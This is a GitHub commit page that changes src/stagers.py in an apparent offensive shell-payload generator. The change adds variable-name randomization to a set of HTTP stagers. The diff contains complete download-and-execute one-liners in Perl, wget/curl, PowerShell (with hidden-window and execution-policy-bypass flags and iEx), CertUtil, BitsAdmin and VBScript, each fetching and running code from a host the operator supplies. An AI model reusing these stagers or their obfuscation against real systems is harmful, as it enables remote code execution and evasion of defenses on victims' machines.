Skip to content

Commit

Permalink
Updated stagers to allow for variable randomization and ipfuscation
Browse files Browse the repository at this point in the history
  • Loading branch information
@capnspacehook
capnspacehook committed Jul 22, 2018
1 parent ec6b593 commit 9ea325f
Showing 1 changed file with 18 additions and 15 deletions.
33 changes: 18 additions & 15 deletions src/stagers.py
View file
Original file line number Diff line number Diff line change
@@ -1,4 +1,5 @@
from shellpop import *
from obfuscators import randomize_vars
from encoders import powershell_base64, xor, to_unicode, to_urlencode
from classes import base64_wrapper, xor_wrapper
from SimpleHTTPServer import SimpleHTTPRequestHandler
Expand Down Expand Up @@ -32,16 +33,18 @@ def start(self):


class HTTPStager(object):
def __init__(self):
def __init__(self, args):
self.payload = None
self.args = None
self.args = args
self.opsec = False # Set to true if it is stealth (hides windows or processes)

def get(self):
"""
Generate the code.
Apply encoding, in the correct order, of course.
"""
self.payload = randomize_vars(self.payload, self.args.obfuscate_small)

# Apply base64 encoding.
self.payload = base64_wrapper(self.name, self.payload, self.args)

Expand All @@ -57,7 +60,7 @@ class Python_HTTP_Stager(HTTPStager):
name = "Python HTTP Stager"

def __init__(self, conn_info, args, filename):
HTTPStager.__init__(self)
HTTPStager.__init__(self, args)
self.args = args
self.host = conn_info[0]
self.port = conn_info[1]
Expand All @@ -68,11 +71,11 @@ class Perl_HTTP_Stager(HTTPStager):
name = "Perl HTTP Stager"

def __init__(self, conn_info, args, filename):
HTTPStager.__init__(self)
HTTPStager.__init__(self, args)
self.args = args
self.host = conn_info[0]
self.port = conn_info[1]
self.payload = """perl -e 'use LWP::UserAgent;my $u=new LWP::UserAgent;my $d="http://{0}:{1}/{2}";my $req=new HTTP::Request("GET", $d);my $res=$u->request($req);my $c=$res->content();system $c' """.format(self.host,
self.payload = """perl -e 'use LWP::UserAgent;$VAR1=new LWP::UserAgent;$VAR2="http://{0}:{1}/{2}";$req=new HTTP::Request("GET", $VAR2);$VAR3=$VAR1->request($req);$VAR4=$VAR3->content();system $VAR4' """.format(self.host,
self.port,
filename)

Expand All @@ -81,7 +84,7 @@ class Wget_HTTP_Stager(HTTPStager):
name = "Wget HTTP stager"

def __init__(self, conn_info, args, filename):
HTTPStager.__init__(self)
HTTPStager.__init__(self, args)
self.args = args
self.host = conn_info[0]
self.port = conn_info[1]
Expand All @@ -93,7 +96,7 @@ class Curl_HTTP_Stager(HTTPStager):
name = "cURL HTTP stager"

def __init__(self, conn_info, args, filename):
HTTPStager.__init__(self)
HTTPStager.__init__(self, args)
self.args = args
self.host = conn_info[0]
self.port = conn_info[1]
Expand All @@ -105,31 +108,31 @@ class Powershell_HTTP_Stager(HTTPStager):
name = "Powershell cmd.exe HTTP Stager"

def __init__(self, conn_info, args, filename):
HTTPStager.__init__(self)
HTTPStager.__init__(self, args)
self.args = args
self.host = conn_info[0]
self.port = conn_info[1]
self.opsec = True
self.payload = """powershell.exe -nop -w hidden -ep bypass -Command $x=new-object net.webclient;$x.proxy=[Net.WebRequest]::GetSystemWebProxy();$x.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$p=$x.downloadString('http://{0}:{1}/{2}');cmd.exe /c $p """.format(self.host, self.port, filename)
self.payload = """powershell.exe -nop -w hidden -ep bypass -Command $VAR1=new-object net.webclient;$VAR1.proxy=[Net.WebRequest]::GetSystemWebProxy();$VAR1.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$VAR2=$VAR1.downloadString('http://{0}:{1}/{2}');cmd.exe /c $VAR2 """.format(self.host, self.port, filename)


class PurePowershell_HTTP_Stager(HTTPStager):
name = "Pure Powershell HTTP Stager"

def __init__(self, conn_info, args, filename):
HTTPStager.__init__(self)
HTTPStager.__init__(self, args)
self.args = args
self.host = conn_info[0]
self.port = conn_info[1]
self.opsec = True
self.payload = """powershell.exe -nop -w hidden -ep bypass -Command $x=new-object net.webclient;$x.proxy=[Net.WebRequest]::GetSystemWebProxy();$x.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;iEx $x.downloadString('http://{0}:{1}/{2}') """.format(self.host, self.port, filename)
self.payload = """powershell.exe -nop -w hidden -ep bypass -Command $VAR1=new-object net.webclient;$VAR1.proxy=[Net.WebRequest]::GetSystemWebProxy();$VAR1.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;iEx $VAR1.downloadString('http://{0}:{1}/{2}') """.format(self.host, self.port, filename)


class Certutil_HTTP_Stager(HTTPStager):
name = "CertUtil Windows HTTP Stager"

def __init__(self, conn_info, args, filename):
HTTPStager.__init__(self)
HTTPStager.__init__(self, args)
self.args = args
self.host = conn_info[0]
self.port = conn_info[1]
Expand All @@ -140,7 +143,7 @@ class BitsAdmin_HTTP_Stager(HTTPStager):
name = "BitsAdmin Windows HTTP Stager"

def __init__(self, conn_info, args, filename):
HTTPStager.__init__(self)
HTTPStager.__init__(self, args)
self.args = args
self.host = conn_info[0]
self.port = conn_info[1]
Expand All @@ -153,11 +156,11 @@ class VbScriptHttpStager(HTTPStager):
name = "VBScript Windows HTTP Stager"

def __init__(self, conn_info, args, filename):
HTTPStager.__init__(self)
HTTPStager.__init__(self, args)
self.args = args
self.host = conn_info[0]
self.port = conn_info[1]
self.payload = """start /wait /b cmd.exe /c echo var H = new ActiveXObject("WinHttp.WinHttpRequest.5.1");H.Open("GET", "http://{0}:{1}/{2}", /*async=*/false);H.Send();B = new ActiveXObject("ADODB.Stream");B.Type = 1;B.Open();B.Write(H.ResponseBody);B.SaveToFile("{2}.bat"); > {2}.js && cscript {2}.js && {2}.bat""".format(self.host, self.port, filename)
self.payload = """start /wait /b cmd.exe /c echo var VAR1 = new ActiveXObject("WinHttp.WinHttpRequest.5.1");VAR1.Open("GET", "http://{0}:{1}/{2}", /*async=*/false);VAR1.Send();VAR2 = new ActiveXObject("ADODB.Stream");VAR2.Type = 1;VAR2.Open();VAR2.Write(VAR1.ResponseBody);VAR2.SaveToFile("{2}.bat"); > {2}.js && cscript {2}.js && {2}.bat""".format(self.host, self.port, filename)


def choose_stager(stagers):
Expand Down

0 comments on commit 9ea325f

Please sign in to comment.